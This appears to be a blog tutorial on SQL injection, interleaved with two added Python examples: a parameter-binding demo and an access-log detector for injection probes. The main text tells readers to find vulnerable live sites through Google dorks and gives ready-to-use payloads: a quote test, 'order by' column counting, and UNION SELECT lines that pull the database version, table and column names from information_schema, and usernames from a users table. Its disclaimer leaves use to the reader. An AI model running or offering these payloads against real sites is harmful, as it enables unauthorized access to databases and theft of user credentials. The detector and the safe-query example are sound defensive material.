IMPORTANT: It should be noted that the very act of attempting an SQL injection on a site without the owner's permission could result in very serious consequences if caught. The information contained below is written in the belief that information should be free, and I leave it for the reader to use it as they wish. If you are looking for somewhere to practise, there are sites that will legally allow you to do so, Altoro Mutual and Hack This Site being two examples.
You may have noticed websites have a lot of information on them. To help manage all this data, sites use databases to store it in. This enables the data to be organised and then quickly retrieved and presented onto a webpage when requested by a visitor to the site.
To help explain, let's imagine a library, where all the books are organised and stored in bookcases according to the library's system. When a visitor requests a book, the librarian can quickly go to the relevant bookcase for that title and, after a quick search, return the book as requested.
Just as libraries need to order their collection of items, websites need to manage their data using databases. Databases are organised into a series of different tables which are much like a spreadsheet, using columns to contain various data such as that of products like video consoles for sale, seen below.
SQL is a language created specifically for managing databases and is used across the web. If you’ve ever been on the internet, you’ve probably used SQL before even if you didn’t know it. Whenever you click a button or enter a search query, an SQL query is sent straight to the database for that site to find what you’re looking for.
That’s great, but I thought this was about hacking?
Most website ‘hacks’ are done through what is known as SQL injection. This involves modifying the SQL commands sent to the database in order to retrieve other information that may not be publicly visible, such as usernames and passwords.
When you normally use a website, you send a command that may look something like this:
SELECT data FROM table
SQL injection involves adding, or ‘injecting’, extra bits of SQL code in order to extract private information from the database, and even to bypass security authentication, such as logging in without having to know a user's password.
But how do you start typing in code? There isn’t exactly a terminal window to start entering commands into, right? Well, actually every user input on a website is a potential injection point: a login box, a search form, or even the URL bar of the browser itself.
Finding Vulnerable Sites using Google Dorks
The only reason hackers are successful is because of poor security. SQL injection isn’t even hard to defend against, but despite this many sites are still vulnerable. To help discover these sites we can use our friend, the search engine. We can look for a specific URL syntax in our search by using what are known as ‘Google Dorks’, search operators such as “inurl:” that target specific content, for example:
This would only find sites with the above as part of their URL. These are just a few examples of many; a quick search will turn up hundreds more. A few more here to get you started.
You can then start testing to see how vulnerable the site is, by causing errors and then seeing how the site reacts.
To do this, all we’re going to do is add a single quotation mark to the end of a URL, after the number.
If the site is properly secured then nothing will happen; however, if it is vulnerable the site will print an SQL error report onto the screen, or just fail to generate the page properly.
Awesome, but what just happened?
To help understand, let's look at the command being used normally.
SELECT * FROM `articles` WHERE articleID='15'
This works fine, but look what happens when we enter the single quotation mark:
SELECT * FROM `articles` WHERE articleID='15''
Notice the extra mark at the end of the line? That’s what we added. In doing so we malformed the query by closing the quotes before the program expected, leaving a dangling quotation mark, which caused it to fail. If you did get an error report, it will probably look something like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/'' line 1
Oh dear, this is seriously bad news for any site, as it's not able to handle our input, making it vulnerable to an attack. That would be terrible.
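The two behaviours described above side by side, as an added example that is not code from the original post: a lookup that pastes the id into the SQL text (the pattern behind article.php) breaks on a stray quote, while the same lookup with parameter binding treats the quote as data. The articles table and its rows are constructed here, using SQLite in place of the site's MySQL.

```python
import sqlite3

# Constructed in-memory stand-in for the site's 'articles' table (assumption).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE articles (articleID INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO articles VALUES (?, ?)",
                 [(14, "Old news"), (15, "Console reviews"), (16, "Site update")])


def vulnerable_lookup(article_id: str):
    # Input becomes part of the SQL text, so a quote in it ends the string
    # literal early and leaves the trailing quote unmatched.
    sql = f"SELECT * FROM articles WHERE articleID='{article_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(article_id: str):
    # Parameter binding sends the input as a value; it is never parsed as
    # SQL, so a quote cannot change the query's structure.
    sql = "SELECT * FROM articles WHERE articleID=?"
    return conn.execute(sql, (article_id,)).fetchall()


def probe(lookup, article_id: str) -> str:
    # What a visitor would observe. The raw database error is caught here
    # rather than printed to the page, which is exactly the information a
    # quote test relies on.
    try:
        rows = lookup(article_id)
    except sqlite3.OperationalError:
        return "sql-error"
    return "rows" if rows else "empty"


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_lookup), ("safe", safe_lookup)):
        for arg in ("15", "15'"):
            print(f"{name:10s} id={arg!r:6} -> {probe(fn, arg)}")
```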
Probing the Database
At this point we’re still completely blind about how the database is structured. Before we can do anything else we need to know how many columns the query returns; without this information we will not be able to get anywhere.
To find this out we use the “order by” clause, followed by the SQL comment marker “-- ” (in MySQL it needs a trailing space) so the rest of the line is ignored. “order by N” sorts the results by the Nth column, and if there is no Nth column the database throws an error, so we keep increasing the number until it does, for example:
| URL entered | Result |
| --- | --- |
| example.com/article.php?id=15 order by 1-- | No error. Try a higher number. |
| example.com/article.php?id=15 order by 7-- | Error/crashed. Try a lower number. |
| example.com/article.php?id=15 order by 6-- | No error. This is the highest number. |
You then keep following this process until you find the highest number at which the site still outputs correctly, as in the example above. This is the number of columns the query returns.
Extracting Data (1)
Now we’ll use the information we learned to help our SQL injection using the “union” statement. This appends the rows returned by a second query to the output of the first, which is why the column count has to match.
union all select 1,2,3,4,5,6--
If you see any numbers appearing on-screen then congratulations – the query successfully generated another row. Otherwise you might need to invalidate the original query (and replace it with our own) to get it to work. The easiest way to do this is by simply adding a minus sign before the number, here are a few combinations you may need to try.
-15 union all select 1,2,3,4,5,6--
-15 and false union all select 1,2,3,4,5,6--
null union all select 1,2,3,4,5,6--
Hopefully you should now be seeing some numbers. Typically you’ll see the title or body of a page replaced with a 1, 2 or 3.
We can then replace the numbers with other data we want to be output, such as the version of the database (assuming the number 2 is being displayed on-screen, this is what we will replace):
-15 union all select 1,version(),3,4,5,6--
And there we have it, our first successful data extraction, the version number of the database system.
However before we can start pulling any more data from the table we need to know where everything is, most importantly the table and column names.
Finding Table Names
To do this we use the following.
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
This may seem complicated, but it's essentially pretty similar to what we did before, except this time we are getting data from the information schema, which contains information on the database, including the names of every table and column inside it.
You will then see the name of a table from the database output to the screen.
You can then cycle through these using “limit” to specify what you want to see.
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database() limit 0,1--
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database() limit 1,1--
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database() limit 2,1--
Etc. You get the idea.
Finding Column Names
Now for the column names, it’s as simple as:
-15 union all select 1,column_name,3,4,5,6 from information_schema.columns where table_schema=database() and table_name='xyz' limit 0,1--
Obviously changing ‘xyz’ to the name of the table you want the information from.
Extracting Data (2)
Once you have all the database information you can begin to extract specific information.
For example, say we wanted all the usernames from a table called users, we would enter:
-15 union all select 1,username,3,4,5,6 from users limit 0,1--
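Seen from the server side, every step of the procedure above (the quote test, the order-by walk, the union rows, the information_schema lookups) leaves a distinctive trace in the web server's access log. The following is an added example, not code from the original post, that classifies decoded request paths against those steps; the log lines and pattern names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Each pattern corresponds to one probing step walked through in the post,
# applied to the URL-decoded request path. Names are this example's own.
PROBES = {
    "quote-probe": re.compile(r"=\d+'(\s|$|&)"),
    "order-by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)", re.I),
}

# Apache/nginx combined-format line: client ip, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log: one client walking the post's steps, one benign search.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /article.php?id=15 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /article.php?id=15%27 HTTP/1.1" 500 612',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /article.php?id=15+order+by+7-- HTTP/1.1" 500 612',
    '203.0.113.7 - - [10/Oct/2023:13:57:10 +0000] "GET /article.php?id=-15+union+all+select+1,2,3,4,5,6-- HTTP/1.1" 200 4980',
    '203.0.113.7 - - [10/Oct/2023:13:58:30 +0000] "GET /article.php?id=-15+union+all+select+1,table_name,3,4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5011',
    '198.51.100.4 - - [10/Oct/2023:14:01:00 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 2200',
]


def classify_request(path: str) -> list:
    """Return the names of the probe patterns present in a request path."""
    decoded = unquote_plus(path)  # %27 -> ', + -> space, as the server sees it
    return [name for name, rx in PROBES.items() if rx.search(decoded)]


def scan_log(lines) -> list:
    """Return (client_ip, path, status, tags) for every request that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        tags = classify_request(path)
        if tags:
            hits.append((ip, path, int(status), tags))
    return hits


if __name__ == "__main__":
    for ip, path, status, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(tags):24s} {path}")
```

A 500 response paired with "quote-probe" or "order-by" is the server confirming the error leak the post relies on, which is worth alerting on separately from the request pattern itself.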
And that… Is how to perform an SQL injection attack.
That’s all for now, thanks for reading.